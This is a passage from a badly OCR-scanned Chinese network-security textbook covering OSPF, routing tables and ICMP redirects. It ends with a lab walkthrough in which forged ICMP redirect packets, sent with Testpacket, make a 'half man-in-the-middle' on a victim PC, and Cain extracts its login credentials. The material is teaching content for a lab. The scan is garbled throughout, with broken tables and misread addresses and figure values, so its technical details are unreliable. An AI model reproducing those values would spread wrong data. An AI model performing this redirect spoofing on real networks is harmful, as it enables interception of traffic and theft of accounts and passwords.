地 址 为 50. 1. 1. 2 ,该 路 由 器 在 这 个 传输 网 络 的 接口 IP 为 50. 1. 1.2, 度 量 值 为 2。 第 二 个 
链 路 表明 终端 网 络 地 址 为 60. 1. 1. 0 , 子 网 掩 码 为 255. 255. 255. 0 ,传输 代价 为 2。 第 三 个 
链 路 表明 传输 网 络 的 DR 路 由 器 的 IP 地 址 为 70.1. 1.2, 该 路 由 器 在 这 个 传输 网 络 的 接口 
IP 为 70.1.1.1.、 度 量 值 为 1。 

ID 为 50.1.1.2 的 路 由 器 也 出 现在 主干 网 络 中 ,因此 可 将 第 五 个 路 由 器 通告 所 对 应 
的 局 部 拓扑 加 入 主干 网 络 。 图 6-71 为 最 终 得 到 的 区 域 网 络 拓 扑 结 构 , 从 图 中 可 以 得 知 网 
络 与 路 由 器 的 连接 关系 ,每 台 路 由 器 在 传输 网 络 的 接口 IP 地 址 ,每 个 传输 网 络 的 DR 路 
由 器 ,每 条 数据 链 路 的 传输 代价 。 


DR of 70.1.1.0 
ID:40.1.1.1 ID:50.1.1.3 


IP:50.1.1.1 
GD 一 时 2 
R1 IP:50.1.1.3 


IP:50.1.1.2 IP:70.1.1.1 
DR of 50.1.1.0 
ID:50.1.1.2 


80.1.1.0 


IP:70.1.1.2 


图 6-71 最 终 得 到 的 区 域 网 络 拓扑 结构 


思考 题 


1. OSPF 路 由 欺骗 有 哪些 危害 ? 
2. 你 能 设计 出 哪些 方案 来 预防 OSPF 路 由 欺骗 ? 
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第 7 章 
”ICMP 及 其 安全 问题 


IP 协议 提供 不 可 靠 的 .无 连接 的 数据 报 传输 服务 ,是 一 种 尽力 提交 服务 , 它 将 一 个 IP 
数据 报 从 信 源 传送 到 信和 宿 。 信 和 宿 端 通过 IP 首部 的 校 验 和 字段 可 以 得 知 数据 报 在 传输 过 
程 中 是 否 出 错 ,但 信 源 端 却 无 法 通过 IP 协议 了 解 到 报 文 是 否 正确 传送 。 即 IP 协议 缺少 
一 种 差错 控制 和 查询 机 制 。 


“7.1 ICMP 报 文 的 类 型 


制定 因特网 控制 报 文 协议 (Internet Control Message Protocol,ICMP) 就 是 为 了 弥补 
IP 协议 这 方面 的 不 足 。ICMP 报 文 分 为 两 大 类 : 差错 报告 报 文 和 查询 报 文 。 

ICMP 重 定向 是 指 在 特定 情况 下 , 当 路 由 器 检测 到 一 台 主 机 使 用 非 优化 路 由 时 ,会 向 
该 主机 发 送 一 个 ICMP 重 定向 报 文 , 要 求 主机 改变 路 由 ,同时 路 由 器 会 把 初始 数据 报 向 目 
的 地 转发 。 


723 计算 机 的 路 由 表 


72.1 计算 机 路 由 表 的 作用 


在 如 图 7-1 所 示 的 网 络 环境 中 ,NET1 和 NET2 通过 Rl 和 R2 两 台 路 由 器 连接 ,图 
中 标 出 了 每 台 设 备 的 接口 IP 地 址 。 链 路 旁边 的 数字 代表 链 路 代价 ,除了 R2 一 NET1 链 
路 的 代价 为 8 之 外 ,其 他 链 路 的 代价 为 2。 

Rl 和 R2 使 用 OSPF 协议 形成 各 自 的 路 由 表 。R2 到 NET1 有 两 条 路 径 可 达 , 本 地 
直 连 链 路 代价 为 8; 经 过 R1 到达 NETI1 的 路 径 代价 为 4, OSPF 协议 选择 最 小 代价 的 路 
径 。 因 此 在 R2 的 路 由 表 中 ,到 达 NET1 的 下 一 跳 为 R1、 代 价 为 4。 

由 于 从 R1 到 NET1 的 代价 为 2, 从 R2 到 NETI1 的 代价 为 8。 因 此 NET2 网 络 中 的 
主机 将 默认 网 关 设置 为 R1。PC1 配置 好 默认 网 关 之 后 ,在 其 路 由 表 中 就 出 现 了 一 条 默认 
路 由 (x* ”x* ”Rl1), 这 条 路 由 可 以 保证 PC1 将 发 给 NETI1 的 数据 报 发 送 给 R1。 下 面 通 
过 一 个 实验 进行 验证 。 


722 计算 机 路 由 表 测 试 实验 
利用 虚拟 机 按照 图 7-1 组 建 网 络 , 配 置 OSPF 路 由 ,测试 网 络 连 通 情 况 。 实 验 目的 是 


PC2 
XP 虚 拟 机 


册 10.1.1.3 


NETI1 


10.1.1.1 10.1.1.2 NI 4 RI 
TD 到: 二 


RI R2 
EE 2 
R1 路 由 表 。 192.168.111.1 | ”2000 虚 拟 机 1 2000 虚 拟 机 2 | 192.168.111.2 RR2 路 由 表 


加 3 
NET2 
点 192.168.111.3 
PC1( 本 机 ) a 
PC1 路 由 表 


图 7-1 计算 机 路 由 表 的 作用 


帮助 读者 掌握 使 用 虚拟 机 模拟 路 由 器 的 方法 。 本 实验 使 用 两 台 Windows 2000 虚拟 机 模 
拟 R1 和 R2,Windows XP 虚拟 机 作为 PC2, 本 机 作为 PC1。 
第 一 步 : 以 host-only 方式 启动 两 台 Windows 2000 虚拟 机 和 一 台 Windows XP 虚拟 


机 。 

为 两 台 Windows 2000 虚拟 机 各 增加 一 块 网 卡 ,配置 方法 为 : 在 关机 状态 下 单 击 “ 编 
辑 虚拟 机 设置 >- 选择 add-~> 添 加 一 块 网 卡 。 

第 二 步 : 参照 图 7-1 为 每 个 对 象 配置 IP 地 址 ,如 图 7-2 一 图 7-5 所 示 。 


thernet adapter 本 地 连接 2: 


Connection-specific DNS Suffix 日 
IP Address. . #7 a 这 a | | 
. : 255.255.255.0 


thernet adapter 本 地 


Connection-specific DNS Suffix 
IP hddress ， 3: 192.168.111.1 
Subnet Mask : 255.255.255.0 
Default _ Gatewa 


图 7-2 Rl 的 卫 地 址 


Ethernet adapter 本 


Connection-specific DNS Suffix 
IP hddress 
: 255.255.255.0 
Default Gateway . . 


Ethernet adapter 本 


Connection-specific DNS Suffix 
IP hddress : 192.168.111.2 
: 255.255.255.8 


Default Gatewa 


图 7-3 R2 的 IP 地 址 
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Ethernet adapter 3 


Connection-specific DNS Suffix 

TP 192.168.111.3 
1 255.255.255.0 
Default Gateway ER Fo or 


图 7-4 PC1 的 IP 地 址 


thernet adapter 本 地 


Connection-specific DNS Suffix 


IP hddress 4 过 
Subnet Mask . 3 . : 255.255.255.0 
Default Gateway . . we 映 | 总 网 说 


图 7-5 PC2 的 IP 地址 


第 三 步 : 为 R1 和 R2 配置 OSPF 路 由 。 

以 R1 为 例 说 明 配 置 OSPF 协议 的 步骤 :“ 开 始 ”>“ 程 序 ”>“ 管 理工 具 ”>“ 路 由 和 远 
程 访问 ”> 右 击 “IP 路 由 选择 ”下 属 的 “常规 ”>“ 新 路 由 选择 协议 ”一 选择 OSPF 一 “确定 ” 
> 右 击 OSPF 一 “新 接口 ”一 依次 添加 两 个 接口 。 注 意 R2 在 添加 本 地 连接 2 网 卡 时 将 代 
价 设置 为 8。 


- 了 » - 十 直 4 ~ a ) 计 此 = 人 -DE 
查看 R1 的 路 由 表 可 以 右 击 静态 路 由 一 显示 IP 路 由 选择 表 。R1 和 R2 通过 OSPF 
协议 形成 的 路 由 表 如 图 7-6、 图 7-7 所 示 。 
10.1.1.0 255. 255. 255.0 1.1.1 2 
10.1.1.0 255. 255. 255.0 10.1.1.1 1 
10.1.1.1 255. 255. 255.255 。 127.0.0.1 
10. 255. 255. 255 。 255. 255. 255.255 。 10.1.1.1 
127.0.0.0 255.0.0.0 127.0.0.1 1 
127.0.0.1 255.255.255.255 127.0.0.1 环 回 1 本 地 
192. 168. 111.0 255.255.255.0 192. 168.111.1 ”本 地 连接 2 OSPF 
192. 168. 111.0 255.255.255.0 192.168.111.1 ”本 地 连接 1 本 地 
192.168. 111. 1 255.255.255.255 。 127.0.0.1 加 1 本 地 
224.0.0.0 240.0.0.0 192.168.111.1 ”本 地 连接 1 本 地 
224.0.0.0 240.0.0.0 10.1.1.1 本 地 连接 2 1 本 地 
255. 255. 255. 255 ”255. 255. 255.255 。 192.168. 111.1 ”本 地 连接 1 本 地 
255. 255. 255. 255 _255. 255.255.255 10.1.1.1 1 


图 7-6 ”RIl 的 路 由 表 


255. 255. 255. 255 ”255. 255. 255. 255 192.168.111.2 


1 
255. 255. 255. 255 ”255. 255. 255.255 10.1.1.2 1 本 地 下 列 ， 
224.0.0.0 240.0.0.0 192. 168.111.2 1 本 地 本 地 连接 
224.0.0.0 240.0.0.0 10.1.1.2 1 本 地 下 列 
192. 168. 111.2 255.255.255.255 127.0.0.1 1 本 地 环 回 
192. 168. 111.0 255.255.255.0 。 192.168.111.2 2 OSPF 本 地 连接 
192. 168. 111.0 255.255.255.0 。 192.168.111.2 1 本 地 本 地 连接 
127.0.0.1 255. 255. 255. 255 127.0.0.1 4 本 地 环 回 
127.0.0.0 255.0.0.0 127.0.0.1 1 本 地 环 回 
10. 255. 255. 255 ”255. 255. 255.255 10.1.1.2 1 本 地 下 列 
10.1.1.2 255. 255. 255. 255 127.0.0.1 1 本 地 环 回 
10.1.1.0 255. 255.255.0 。 192.168.111.1 4 OSPF 本 地 连接 
10.1.1.0 255.255.255.0 _10.1.1.2 1 本 地 下 列 


图 7-7 R2 的 路 由 表 


第 四 步 : 查看 本 机 的 路 由 表 , 如 图 7-8 所 示 。 
第 五 步 : 测试 网 络 连 通 情况 。 
在 PC1 上 使 用 ping 命令 访问 PC2.ping 命令 的 测试 结果 如 图 7-9 所 示 。 测 试 结果 说 
明 网 络 通信 正常 。PC1 发 出 的 数据 经 过 Rl1 转发 给 PC2, PC2 返回 的 数据 经 过 R2 转 
给 PC1 
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默认 路 由 


Netmask Gateway Interface 


3 
25: 


1 
' 
192.168.111.9 255.255.255.0 3 
192.168.111.3 255.255.255.255 .9.9.1 
192.168.111.255 255.255.255.255 有 这 
224.0.0.0 240.0.0.0 3 
255.255.255.255 255.255.235.255 3 


图 7-8 本 机 的 默认 路 由 


D:\Documents and Settings\xgt>ping 19.1.1.3 
Pinging 10.1.1.3 with 32 bytes of data: 


1 | 
10.1.1. 
1 
1 


.3: bytes:=:32 time:=?ms 


bytes=32 time<1ms 
bytes=32 time<1ms 
bytes=32 time<ims TTL:127 


LL 放风 
10:1. 


图 7-9 PC1 ping PC2 


7 3 ICMP 重 定向 


7.3.1 ICMP 重 定向 过 程 


ICMP 重 定向 是 指 在 特定 情况 下 , 当 路 由 器 检测 到 一 台 主 机 使 用 非 优 化 路 由 时 ,会 向 
该 主机 发 送 一 个 ICMP 重 定向 报 文 , 要 求 主 机 改变 路 由 ,同时 路 由 器 会 把 初始 数据 报 向 目 
的 地 转发 。 

在 如 图 7-10 所 示 的 网 络 环境 中 ,假设 R1 一 NET1 链 路 由 于 某 种 原因 中 断 , 这 样 一 来 


PFC2 
Windows XP 虚拟 机 


10.1.1.3 


NETI1 


N1 10 R2 ( N1 8 


; 一 有 这 二 
2 10.1.1.1 10.1.1.2 De 


1 
1. IP 数 据 报 1 | 


192.168.111.3 


PC1( 本 机 ) * * RI 
PC2 * R2 


图 7-10 ICMP 重 定向 过 程 
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NET1 和 NET2 只 能 通过 R2 进行 通信 。R1 和 R2 在 OSPF 协议 的 作用 下 及 时 更 新 各 自 
的 路 由 表 以 适应 网 络 拓扑 结构 的 变化 。R1 的 路 由 表 中 到 达 NET1 的 路 由 更 改 为 N1 一 
10 一 R2,R2 的 路 由 表 中 到 达 NET1 的 路 由 更 改 为 N1 一 8 一 本 地 。 

PC1 并 不 知道 网 络 拓扑 结构 的 改变 , 它 发 送 给 PC2 的 IP 数据 报 仍然 提交 给 默认 网 
关 R1。R1 通过 查找 自己 的 路 由 表 ,发 现 这 个 IP 数据 报 和 第 一 条 路 由 匹配 ,于 是 将 它 转 
发 给 R2、 由 R2 转发 给 PC2, 与 此 同时 R1 发 现 PC1 使 用 了 一 条 非 优 化 路 由 ,于 是 向 PC1 
发 送 一 个 ICMP 重 定向 报 文 。 这 个 ICMP 重 定向 报 文 会 在 PC1 的 路 由 表 中 添加 一 条 特 
定 主机 路 由 : PC2-* -R2, 它 的 优先 级 高 于 默认 路 由 ,此 后 PC1 发 送 给 PC2 的 IP 数据 报 
都 将 直接 交付 给 R2 ,由 R2 转发 给 PC2。 


7.32 ICMP 重 定向 报 文 结 构 


ICMP 重 定向 报 文 结构 如 图 7-11 所 示 , 共 70 字 节 。 前 14 字 节 是 链 路 层 数 据 , 源 
MAC 地 址 为 R1( 即 默认 网 关 ), 目 的 MAC 地 址 为 PC1 ,协议 类 型 为 0x0800( 即 网 络 层 使 
用 了 协议 )。 


PCI MAC | 5 
RI MAC R2 IP 
个 20B | 
Link data IP header | IP header | remainder data 
14B UL 8B UL 8B 
length | length 
id flag id flag 
| check | | check 
| RIP | PclIP 
PC1 IP PC2 IP 


图 7-11 ICMP 重 定向 报 文 结构 


网 络 层 是 20 字 节 的 IP 数据, 其 中 源 IP 地 址 为 Rl, 目的 IP 地 址 为 PC1。 注 意 : 主机 
只 信任 默认 网 关 发 出 的 ICMP 重 定向 报 文 。 

传输 层 是 8 字 节 的 ICMP 数据 。 第 一 个 字段 是 ICMP 报 文 类 型 ,5 代表 这 是 一 个 
ICMP 重 定向 数据 报 。 第 二 个 字段 是 重 定向 类 型 ,1 代表 这 是 一 个 特定 主机 重 定向 报 文 。 
第 三 个 字段 是 校 验 和 (check)。 第 四 个 字段 记录 的 是 新 网 关 的 IP 地 址 ,这 里 为 R2 的 IP。 

应 用 层 共 28 字 节 ,记录 的 是 PC1 发 给 PC2 的 原始 IP 数据 报 中 的 28 字 节 数据 ,包括 
20 字 节 网 络 层 和 8 字 节 传输 层 数 据 , 因 此 在 这 个 网 络 层 20 字 节 数据 中 源 IP 地 址 为 
PC1 目的 IP 地 址 为 PC2。 

PC1 收 到 这 个 ICMP 重 定向 报 文 之 后 ,发 现 报 文 是 由 当前 网 关 R1 发 出 的 ,于 是 信任 
报 文 携带 的 重 定向 信息 。 从 ICMP 数据 中 取出 新 网 关 R2 的 IP 地 址 ,从 应 用 层 数据 中 取 
出 PC2 的 IP 地 址 ,将 这 两 个 地 址 作为 一 条 映射 记录 添加 到 自己 的 路 由 表 中 。 
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7.33 ICMP 重 定向 测试 实验 


利用 虚拟 机 按照 图 7-10 组 建 网 络 , 中 断 R1 一 NETI1 链 路 ,捕获 .分 析 ICMP 重 定 
报 文 。 使 用 两 台 Windows 20 
机 作为 PC2 

第 一 步 ， 按照 图 7 
略 ) 。 

第 二 步 : 查看 当前 PC1 的 路 由 表 。 
图 7-12 为 PC1 的 路 由 表 , 最 上 面 一 东 为 点 兴 蕴 四 5 在 所 有 路 由 珊 中 矶 处 路 由 出 优先 
低 ,PC1 发 给 NET2 的 所 有 IP 数据 报 都 将 在 这 条 默认 路 由 的 作用 下 转发 给 R1。 


默认 路 由 


向 
000 虚拟 机 模拟 Rl1 和 R2, 本 机 作为 PC1,Windows XP 虚拟 


-10 组 建 实验 环境 ,配置 IP 地 址 和 OSPF 路 由 ,实现 网 络 连 通 ( 步 骤 


级 最 


Active Routes 
Network Destination 
0.0.0.0 
127.0.0.0 
192.168.111.0 


Netmask 
0.06.0.0 
255.0.0.0 
255.255.255.0 
255.255.255.255 
255.255.255.255 
240.0.0.0 
255.255.255.255 
192.168.111.1 


Gateway 


Interface 
.168. 3 


.168 . 


192.168.111.3 
192.168.111.255 
224.0.0.0 
255.255.255.255 
Default Gateway: 


图 7-12 


PC1 的 路 由 表 


第 三 步 : 中 断 R1 一 NET1 链 路 ,观察 R1 和 R2 路 由 表 的 变化 。 


这 里 采用 将 R1 与 NET1 连接 的 网 卡 停 用 的 方法 来 模拟 链 路 中 断 。 链 路 中 断 之 后 ， 
R1 和 R2 会 在 OSPF 协议 的 作用 下 及 时 更 新 各 自 的 路 由 表 , 如 图 7-13 和 图 7-14 所 示 。 
网 络 掩 码 网 BE 接 
255. 255. 255. 255 5 2 255 255 192.168.111.1 1 本 地 本 地 连接 
224.0.0.0 192.168.111.1 1 本 地 本 地 连接 
192. 168.111.1 255 2s5 255 127.0.0.1 1 本 地 环 回 
192. 168. 111.0 255. 255.255.0 192.168.111.1 2 OSPF 本 地 连接 
192. 168. 111.0 255.255.255.0 。 192.168.111.1 1 本 地 本 地 连接 
127.0.0.1 255. 255. 255.255 127.0.0.1 1 本 地 
127.0.0.0 255.0.0.0 127.0.0.1 1 本 地 环 回 
10.1.4.0 255.255.255.0 192.168.1112 10 OSPF 本 地 连接 ”变化 的 路 由 
图 7-13 RIl 的 路 由 表 
目标 网 络 掩 码 网 关 接口 跃 点 数 | 通信 协议 
10.1.1.0 255.255.255.0 10.1.1.2 拉 杯 2 8 0SPF 变化 的 路 由 
10.1.1.0 255. 255.255.0 10.1.1.2 连 振 2 1 本 地 
10.1.1.2 255. 255. 255. 255 127.0.0.1 环 回 1 本 地 
10. 255. 255. 255 。 255. 255. 255.255 10.1.1.2 本 地 连接 2 1 本 地 
127.0.0.0 255.0.0.0 127.0.0.1 回 1 本 地 
127.0.0.1 255. 255. 255.255 127.0.0.1 回 1 本 地 
192. 168. 111.0 。 255.255.255.0 192.168.111.2 ”本 地 连接 2 DSPF 
192. 168. 111.0 ”255.255.255.0 ”192.168.111.2 ”本 地 连接 1 本 地 
192. 168. 111.2 255.255.255.255 127.0.0.1 环 回 1 本 地 
224.0.0.0 240.0.0.0 192.168.111.2 本 地 连接 1 本 地 
224.0.0.0 240.0.0.0 10.1.1.2 本 地 连接 2 1 本 地 
255. 255. 255. 255 255.255.255.255 192.168.111.2 。 本 地 连接 1 本 地 
255. 255. 255. 255 255.255.255.255 10.1.1.2 本 地 连接 2 1 本 地 
图 7-14 R2 的 路 由 表 


第 四 步 : 在 PC1 上 ping PC2, 同 时 捕获 ,分析 ICMP 重 定向 报 文 。 
捕获 到 的 ICMP 重 定向 报 文 共 70 字 节 ,下 面 按照 TCP/IP 层次 分 析 报 文 结构 。 
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图 7-15 给 出 的 是 前 14 字 节 数据 链 路 层 结构 。 目 的 MAC 地 址 为 00-50-56-c0-00-01 , 即 
PC1 的 MAC 地 址 ; 源 MAC 地 址 为 00-0c-29-5c-7e-7b, 即 Rl 的 MAC 地 址 ;协议 类 型 为 
0800 , 即 网 络 层 是 IP 协议 。 


目的 MAC: PC1 源 MAC:R1 协议 :IP 


0asossels0r00701 00r05r29|se778775 08|o0 :< 01| 


00 38 26 8a 00 00 80 01 b4 es c0 a8 6f 01 c0 sg 
6f 03 05 01 75 f7 c0 a8 6f 02 45 00 00 3c 06 5f 
00 00 40 01 39 b3 c0 a8 6f 03 0a 01 01 03 08 00| 
42 Sc 02 00 09 00 


图 7-15 ICMP 重 定向 报 文 的 链 路 层 数据 结构 


7-16 给 出 的 是 20 字 节 网 络 层 数据 结构 。 其 中 协议 类 型 为 01 ,说 明 传输 层 采 用 的 
是 ICMP。 源 IP 地 址 为 192.168.111.1, 即 Rl 的 IP 地 址 ;目的 IP 地 址 为 192. 168. 111. 
3, 即 PC1 的 IP 地 址 。 


Total LEN=56 


Flag=000 offset=0 VER=4 HLEN=20 


42|5c 02 00 09 00 
目的 IP:192. 168. 111.3 


图 7-16 ICMP 重 定向 报 文 的 网 络 层 数据 结构 


协议 :IQIP 源 IP:192. 168. 111. 1 


图 7-17 给 出 的 是 8 字 节 传输 层 数据 结构 。 传 输 层 采用 的 是 ICMP, 新 网 关 IP 为 
192.168.111.2, 即 R2 的 IP 地址。 


图 7-17 ICMP 重 定向 报 文 的 传输 层 数 据 结 构 


图 7-18 给 出 的 是 28 字 节 应 用 层 数 据 结构 。 应 用 层 数据 记录 的 是 PC1 发 给 PC2 的 
原始 IP 数据 报 中 的 28 字 节 数据 ,包括 20 字 节 网 络 层 和 8 字 节 传输 层 数据 ,因此 在 这 个 
VER=4 HLEN=20 Total LEN=60 


校 验 和 ID=1361 


00 50 56 c0 00|01 00 0c 29 Sc|7e|7b 08|00 45|00 
00 38 26 8a 00|00 80 01 b4 eS |c0 ja8 6f |01 c0la8 
03 


协议 :IOQMP 
TTL:64 源 IP:192. 168. 111. 3 


目的 IP:10. 1. 1.3 


7-18 ICMP 重 定向 报 文 的 应 用 层 数 据 结 构 


185 


网 络 安全 基础 


网 络 层 20 字 节 数据 中 源 IP 地 址 为 192. 168. 111. 3, 即 PC1 的 IP; 目 的 IP 地 址 为 10. 1. 
1.3, 即 PC2 的 IP。 

第 五 步 : 查看 PC1 的 路 由 表 , 观 察 重 定向 路 由 。 

PC1 的 路 由 表 如 图 7-19 所 示 , 可 见 其 中 添加 了 一 条 到 达 PC2 的 特定 主机 路 由 ,这 条 
重 定向 路 由 的 优先 级 高 于 默认 路 由 ,PC1 发 给 PC2 的 数据 报 将 在 这 条 路 由 的 作用 下 转发 
给 R2。 


重 定向 路 由 


Active Routes: 

Network Destination Netmask Gateway Interface Metric 
9.9.9.9 9.9.9.9 .168.111 . .168 . 
19.1.1.3_255.255.255.255 .168 .. .168. 

127.0.0.9 255.9.9.9 
192.168.111.0 255.255.255.0 


192.168.111.255 255.255.255.255 
224.9.9.9 240.9.9.9 
255.255.255.255 255.255.255.255 
Default Gateway: 192.168.111.1 


3 
区 
1 
3 
192.168.111.3 255.255.255.255 .9.9. -0.0.1 
3 
3 
3 


图 7-19 PC1 的 路 由 表 
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741 基于 ICNP 重 定向 的 “ 半 中 间 人 ”攻击 过 程 


在 如 图 7-20 所 示 的 网 络 中 ,Hacker 向 PC1 发 送 一 个 伪造 的 ICMP 重 定向 报 文 ,由 于 
重 定向 报 文 的 源 IP 地 址 被 伪造 为 默认 网 关 R1 的 IP, 因 此 PC1l 信任 这 个 报 文 携带 的 重 定 
向 路 由 信息 。 这 个 重 定向 报 文 会 在 PC1 的 路 由 表 中 添加 一 条 到 达 PC2 的 特定 主机 路 由 : 
PC2 
Windows XP 虚拟 机 Sp 10.1.12 
NETI1 
N1 2 一 MO RI1 Hacker 志 》 
N2 2 一 路 由 器 XP 虚拟 机 192.168.111.4 
192.168.111.1 1 3.IP 数 据 报 | 1| 
2 数据 报 | | 
NET2 | | 一 --- 一 < 一 一 二 一 一 一 一 4 
1 


| 1. ICMP 重 定向 


山 192.168.111.3 


PC1( 本 机 ) i 
PC2 * H 


上 几 


图 7-20 基于 ICMP 重 定向 的 “ 半 中 间 人 ”攻击 过 程 
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PC2- x* -H, 即 发 送 给 PC2 的 数据 报 ,下 一 跳 IP 地 址 为 Hacker。 这 样 一 来 ,PC1 发 送 给 
PC2 的 所 有 IP 数据 报 都 将 交付 给 Hacker, Hacker 再 将 通信 数据 转发 给 R1, 最 后 由 R1 
将 数据 交付 给 PC2。 在 这 个 过 程 中 Hacker 成 为 通信 数据 的 “中 间 人 ”, 它 可 以 从 中 转 的 
通信 数据 中 提取 出 有 价值 的 敏感 信息 (例如 : 账户 、 密 码 ) ,也 可 以 算 改 通信 内 容 。 

PC2 返回 给 PC1 的 数据 报到 达 R1l 之 后 ,Rl 通过 查找 自身 的 路 由 表 发 现 PC1 位 于 
本 地 直 连 网 络 NET2, 于 是 将 返回 数据 报 直接 交付 给 PC1, 即 返回 数据 不 会 经 过 Hacker 
主机 中 转 , 因 此 Hacker 是 PC1 和 PC2 之 间 的 “ 半 中 间 人 ”, 即 只 能 中 转 PC1 到 PC2 方向 
的 通信 数据 ,而 不 能 中 转 PC2 到 PC1 方向 的 通信 。 


742 伪造 的 ICMP 重 定向 报 文 结 构 分 析 


伪造 的 ICMP 重 定向 报 文 结构 如 图 7-21 所 示 , 共 70 字 节 。 前 14 字 节 是 链 路 层 数 
据 , 源 MAC 地 址 为 H( 即 Hacker) ,目的 MAC 地 址 为 PC1 ,协议 类 型 为 0x0800( 即 网 络 
层 使 用 IP 协议 ) 。 


PCI MAC | 5 | 1 | sheck 
HMAC HIP 
个 20B 个 20B 
Link data IP header | ICMP head | IP header | remainder data 
14B UL 8B UL 8B 
length | length 
id flag id | flag 
check check 
R11IP PC1 正 
PC1 IP PC2WP 


图 7-21 伪造 的 ICMP 重 定向 报 文 


网 络 层 是 20 字 节 的 IP 数据。 由 于 主机 只 信任 默认 网 关 发 出 的 ICMP 重 定向 报 文 ， 
因此 将 源 IP 地 址 设置 为 R1, 目 的 IP 地址 设置 为 PC1 。 

传输 层 是 8 字 节 的 ICMP 数据 。 第 一 个 字段 是 ICMP 报 文 类 型 ,5 代表 这 是 一 个 
ICMP 重 定向 数据 报 。 第 二 个 字段 是 重 定向 类 型 ,1 代表 这 是 一 个 特定 主机 重 定 向 报 文 。 
第 三 个 字段 是 校 验 和 (check)。 第 四 个 字段 记录 的 是 新 网 关 的 IP 地 址 ,这 里 设置 为 
Hacker 的 IP。 

应 用 层 共 28 字 节 ,记录 的 是 伪造 的 PC1 发 给 PC2 的 原始 IP 数据 报 中 的 28 字 节 数 
据 , 包 括 20 字 节 网 络 层 和 8 字 节 传输 层 数据 ,因此 在 这 个 网 络 层 20 字 节 数据 中 , 源 IP 地 
址 为 PC1, 目 的 IP 地 址 为 PC2。 

PC1 收 到 这 个 ICMP 重 定向 报 文 之 后 ,发 现 报 文 是 由 当前 网 关 R1 发 出 的 ,于 是 信任 
报 文 携带 的 重 定向 信息 。 从 ICMP 数据 中 取出 新 网 关 H 的 IP 地 址 ,从 应 用 层 数据 中 取 
出 PC2 的 IP 地 址 ,将 这 两 个 地 址 作为 一 条 映射 记录 添加 到 自己 的 路 由 表 中 , 即 PC2- 
x*-H。 
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743 利用 “ICMP 重 定向 攻击 ”实施 数据 监听 实验 


按照 图 7-20 组 建 实验 环境 ,在 PC2 上 搭建 一 个 电子 商务 站 点 。Hacker 向 受害 者 
PC1 发 送 伪造 的 ICMP 重 定向 报 文 , 在 受害 者 主机 添加 一 条 到 达 PC2 的 路 由 信息 ,其 下 
一 跳 路 由 器 地 址 为 Hacker 主机 IP。 这 样 一 来 ,PC1 发 往 PC2 的 数据 报 将 经 过 Hacker 
主机 中 转 ,攻击 者 从 中 转 数据 中 提取 出 受害 者 的 登录 账户 信息 。 但 路 由 器 的 返回 报 文 仍 
然 直 接 传递 给 PC1 主机 ,因此 将 这 种 攻击 称 为 “ 半 中 间 人 ”攻击 ,如 图 7-22 所 示 。 


号 - wy 


~ Ed 路 由 器 
名 
攻击 者 
图 7-22 “ 半 中 间 人 攻击 ” 


使 用 的 实验 工具 包括 Testpacket 和 cain。Testpacket 负责 每 隔 1s 向 受害 者 主机 发 
送 一 个 伪造 的 重 定向 报 文 ,同时 它 还 负责 转发 受害 者 的 数据 流 。cain 负责 从 通信 数据 中 
提取 出 受害 者 的 账户 和 密码 。 

第 一 步 : 按照 图 7-20 组 建 实验 环境 ,配置 IP 地 址 和 OSPF 路 由 ,实现 网 络 连通 (步骤 
略 ) 。 

第 二 步 : 在 PC2 上 安装 “电子 商务 站 点 ”。 

在 PC2 上 安装 “电子 商务 ”网 站 ,首先 需要 确定 Web 服务 器 主 目录 的 位 置 ,这 个 信息 
可 以 在 IIS 服务 管理 器 中 查看 。 在 Web 服务 器 的 IIS 管理 器 中 右 击 “默认 站 点 ”一 选择 
“属性 ?一 单 击 “ 主 目录 ?标签 ,在 本 地 目录 下 保存 该 网 站 的 主 目录 。 本 例 中 网 站 的 主 目录 
为 e:\aaa 文件 夹 。 

确定 了 网 站 的 主 目录 为 e:Naaa 文件 夹 , 接 下 来 可 以 将 “电子 商务 ”站 点 的 源 代码 直接 
放置 在 该 文件 夹 内 ,同时 在 SQL Server 数据 库 中 附加 站 点 数据 库 , 至 此 网 站 搭建 完成 ,可 
在 远程 主机 测试 。 图 7-23 为 在 本 机 访问 “电子 商务 ”站 点 的 测试 结果 。 

第 三 步 : 在 Hacker 主机 实施 重 定向 攻击 。 

在 Hacker 主机 使 用 Testpacket 向 PC1 发 起 ICMP 重 定向 攻击 。Testpacket 每 隔 1s 
向 PC1l 发 送 一 个 伪造 的 ICMP 重 定向 报 文 , 这 个 重 定向 报 文 会 在 PC1 的 路 由 表 中 添加 一 
条 到 达 PC2 的 特定 主机 路 由 : PC2-*-H, 即 发 送 给 PC2 的 数据 报 ,下 一 跳 IP 地 址 为 
Hacker。 这 样 一 来 , PC1 发 送 给 PC2 的 所 有 IP 数据 报 都 将 交付 给 Hacker, 同时 
Testpacket 还 负责 将 PC1 的 通信 数据 流转 发 给 R1。 

Testpacket 软件 的 使 用 步骤 见 图 7-24。 首 先 软 件 自动 识别 出 攻击 机 上 安装 的 所 有 网 
卡 ,然后 用 列表 的 形式 显示 出 来 ,输入 网 卡 对 应 的 编号 , Testpacket 即 工作 在 选 定 网 卡 之 
上 。 在 本 例 中 因为 攻击 机 只 有 一 块 网 卡 ,因此 输入 编号 1。 

之 后 软件 提示 input localhost ipaddr: 要 求 输入 本 机 IP, 这 里 输入 攻击 机 IP 地 址 


188 


/2 zxgt - Windows Internet Explorer 
文件 下 ) ” 蝙 辑 字 ) 查看) ” 收 若 夹 由 ) 工具 CI) ”帮助 0 
遍 收 藏 天 | 次 忆 。 固 免 费 Motmsil 下 

Gret 


Www .MINGnisoFT.coM og | 现在 的 时 间 是 : 2012-11-6 14:01:39 


【市 场 价 : 50】 


【浏览 次 数 : 165】 


欢迎 使 用 本 网 站 。 在 学 

习 、 使 用 过 程 中 如 有 任 pi 

何 问 题 或 建议 请 您 登录 【市 场 价 : 50】 

网 站 [会 a 
【查看 信息 】 


【市 场 价 : 800】 


| 四 站 内 新 闻 


@ Internet 


图 7-23 在 本 机 访问 “中 网 景 论坛 ” 


\TestPacketC 


Packet .dll test application. Library version:4.1.0.1753 
Adapters installed: 


1- \Device\NPF_{1E8A4568-3209-4832-92D5-B97523DBB718}) 


: 1 一 选择 网 卡 


192.168.111.4 
localhost MAC: 9. c.29.fe.b9.85 一 自动 获得 攻击 机 EAC 
input gateway ipaddr:192.168.111.1 一 - 输入 网 关 IP 
192.168.111.1 
macaddr MAC: 6. c.29.5c.7e.7b 一 自动 获得 网 关 EAC 
input internet host ipaddr:19.1.1.2 一 输入 外 网 主机 IP 
半 风 展 ] 
input redirect host ipaddr:192.168.111.3 一 输入 被 攻击 主机 IP 
192.168.111.3 
